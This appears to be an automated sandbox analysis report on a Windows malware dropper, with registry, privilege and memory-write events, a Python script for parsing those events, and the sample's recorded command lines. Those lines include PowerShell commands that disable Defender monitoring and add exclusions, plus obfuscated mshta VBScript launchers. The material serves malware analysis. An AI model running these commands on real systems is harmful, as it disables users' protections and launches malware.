Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0663b341399ee.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0675f75df01bdb.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\096fc162ed138cc3d9ee62631325c0d7d2957d6a1b7eec705da59004b83fd6c8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0647140c100d63.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat06f5ed0e3bb24.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0618d93ac2c5c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\09xU.exE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0619212f22dd7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat062000ca9aa6.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat06ebc37d1c94352.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2552 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\096fc162ed138cc3d9ee62631325c0d7d2957d6a1b7eec705da59004b83fd6c8.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2552 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\096fc162ed138cc3d9ee62631325c0d7d2957d6a1b7eec705da59004b83fd6c8.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2552 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\096fc162ed138cc3d9ee62631325c0d7d2957d6a1b7eec705da59004b83fd6c8.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2552 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\096fc162ed138cc3d9ee62631325c0d7d2957d6a1b7eec705da59004b83fd6c8.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2552 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\096fc162ed138cc3d9ee62631325c0d7d2957d6a1b7eec705da59004b83fd6c8.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2552 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\096fc162ed138cc3d9ee62631325c0d7d2957d6a1b7eec705da59004b83fd6c8.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2552 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\096fc162ed138cc3d9ee62631325c0d7d2957d6a1b7eec705da59004b83fd6c8.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1712 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe
PID 1712 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe
PID 1712 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe
PID 1712 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe
PID 1712 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe
PID 1712 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe
PID 1712 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe
PID 2796 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2712 wrote to memory of 2840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2712 wrote to memory of 2840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2712 wrote to memory of 2840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2712 wrote to memory of 2840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2712 wrote to memory of 2840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2712 wrote to memory of 2840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2712 wrote to memory of 2840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2872 wrote to memory of 2604 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WerFault.exe
PID 2872 wrote to memory of 2604 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WerFault.exe
PID 2872 wrote to memory of 2604 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WerFault.exe
PID 2872 wrote to memory of 2604 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WerFault.exe
PID 2872 wrote to memory of 2604 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WerFault.exe
PID 2872 wrote to memory of 2604 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WerFault.exe
PID 2872 wrote to memory of 2604 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WerFault.exe
PID 2796 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2024 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
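
The records above carry one line per WriteProcessMemory event, so the same writer/target pair repeats and the launch chain is hard to read. The script below, an added example rather than part of this report, parses lines in that layout, counts events per pair and prints root-to-leaf chains. In this detonation every pair also appears as a parent/child launch in the Processes list (setup_install.exe starting cmd.exe, cmd.exe starting powershell.exe), so read the chains as a process tree and reserve the word injection for a writer that is not the target's parent. The sample records are copied from the list above; the report's own parsing is not shown here.

```python
import ntpath
import re
from collections import Counter, defaultdict

# Constructed input: a handful of the "wrote to memory" records from the list
# above, copied in the report's own flat layout. Real reports carry many more.
SAMPLE_RECORDS = r"""
PID 1712 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe
PID 1712 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe
PID 2796 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2712 wrote to memory of 2840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2796 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2604 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WerFault.exe
"""

# One record: writer PID, target PID, writer image, target image. The report
# prints image paths without spaces, so a whitespace split is safe here;
# paths under "Program Files" would need a quoted-path parser instead.
RECORD_RE = re.compile(r"^PID (\d+) wrote to memory of (\d+) N/A (\S+) (\S+)$")


def parse_records(text):
    """Return (writer_pid, target_pid, writer_image, target_image) tuples."""
    records = []
    for line in text.splitlines():
        m = RECORD_RE.match(line.strip())
        if m:
            records.append((int(m.group(1)), int(m.group(2)), m.group(3), m.group(4)))
    return records


def edge_counts(records):
    """How many write events each writer->target pair produced."""
    return Counter((src, dst) for src, dst, _, _ in records)


def process_images(records):
    """PID -> image path, taken from whichever side of a record names it."""
    images = {}
    for src, dst, src_img, dst_img in records:
        images[src] = src_img
        images[dst] = dst_img
    return images


def write_chains(records):
    """Root-to-leaf PID chains; roots are PIDs nobody wrote into."""
    children = defaultdict(set)
    targets = set()
    for src, dst, _, _ in records:
        children[src].add(dst)
        targets.add(dst)
    roots = sorted(set(children) - targets)
    chains = []

    def walk(pid, path):
        nxt = sorted(children.get(pid, ()))
        if not nxt:
            chains.append(path)
            return
        for child in nxt:
            if child in path:      # PID reuse could create a loop; stop there
                continue
            walk(child, path + [child])

    for root in roots:
        walk(root, [root])
    return chains


def format_chain(chain, images):
    """Render a chain as 'pid:image.exe -> pid:image.exe'."""
    return " -> ".join(f"{pid}:{ntpath.basename(images[pid])}" for pid in chain)


if __name__ == "__main__":
    recs = parse_records(SAMPLE_RECORDS)
    imgs = process_images(recs)
    for chain in write_chains(recs):
        print(format_chain(chain, imgs))
    for (src, dst), n in sorted(edge_counts(recs).items()):
        print(f"{src} -> {dst}: {n} write(s)")
```

Feeding the full list above into parse_records gives the chains setup_installer.exe -> setup_install.exe -> cmd.exe -> powershell.exe and setup_installer.exe -> setup_install.exe -> cmd.exe -> WerFault.exe, with seven writes on each cmd.exe edge; a single write from an unrelated process into powershell.exe would stand out against that baseline.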

Processes

C:\Users\Admin\AppData\Local\Temp\096fc162ed138cc3d9ee62631325c0d7d2957d6a1b7eec705da59004b83fd6c8.exe

"C:\Users\Admin\AppData\Local\Temp\096fc162ed138cc3d9ee62631325c0d7d2957d6a1b7eec705da59004b83fd6c8.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat0663b341399ee.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat062000ca9aa6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat0647140c100d63.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat060fd7e42d2.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat06f5ed0e3bb24.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat0619212f22dd7.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat06ebc37d1c94352.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat0618d93ac2c5c.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat0675f75df01bdb.exe

C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0647140c100d63.exe

Sat0647140c100d63.exe

C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat06ebc37d1c94352.exe

Sat06ebc37d1c94352.exe

C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0663b341399ee.exe

Sat0663b341399ee.exe

C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0675f75df01bdb.exe

Sat0675f75df01bdb.exe

C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat062000ca9aa6.exe

Sat062000ca9aa6.exe

C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0619212f22dd7.exe

Sat0619212f22dd7.exe

C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat06f5ed0e3bb24.exe

Sat06f5ed0e3bb24.exe

C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0618d93ac2c5c.exe

Sat0618d93ac2c5c.exe

C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat060fd7e42d2.exe

Sat060fd7e42d2.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "Sat0675f75df01bdb.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0675f75df01bdb.exe" & exit

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0663b341399ee.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0663b341399ee.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBscRIpT: ClOsE (CReAteObJect("WScRipT.ShELL" ). RUn ( "CMd.eXE /Q /c cOpY /y ""C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat06f5ed0e3bb24.exe"" H2LAVMGsZFX.EXe && sTArt H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5&if """" == """" for %z in ( ""C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat06f5ed0e3bb24.exe"" ) do taskkill -Im ""%~nXz"" /F " , 0 , TrUe ) )

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2824 -s 272

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "Sat0675f75df01bdb.exe" /f

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /c cOpY /y "C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat06f5ed0e3bb24.exe" H2LAVMGsZFX.EXe && sTArt H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5&if "" == "" for %z in ( "C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat06f5ed0e3bb24.exe" ) do taskkill -Im "%~nXz" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0663b341399ee.exe" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0663b341399ee.exe" ) do taskkill /F -Im "%~NxU"

C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe

H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5

C:\Windows\SysWOW64\taskkill.exe

taskkill -Im "Sat06f5ed0e3bb24.exe" /F

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBscRIpT: ClOsE (CReAteObJect("WScRipT.ShELL" ). RUn ( "CMd.eXE /Q /c cOpY /y ""C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe"" H2LAVMGsZFX.EXe && sTArt H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5&if ""/paMxRK9ViV3PT5Jnz5"" == """" for %z in ( ""C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe"" ) do taskkill -Im ""%~nXz"" /F " , 0 , TrUe ) )

C:\Users\Admin\AppData\Local\Temp\09xU.exE

09xU.EXE -pPtzyIkqLZoCarb5ew

C:\Windows\SysWOW64\taskkill.exe

taskkill /F -Im "Sat0663b341399ee.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )

C:\Windows\SysWOW64\cmd.exe

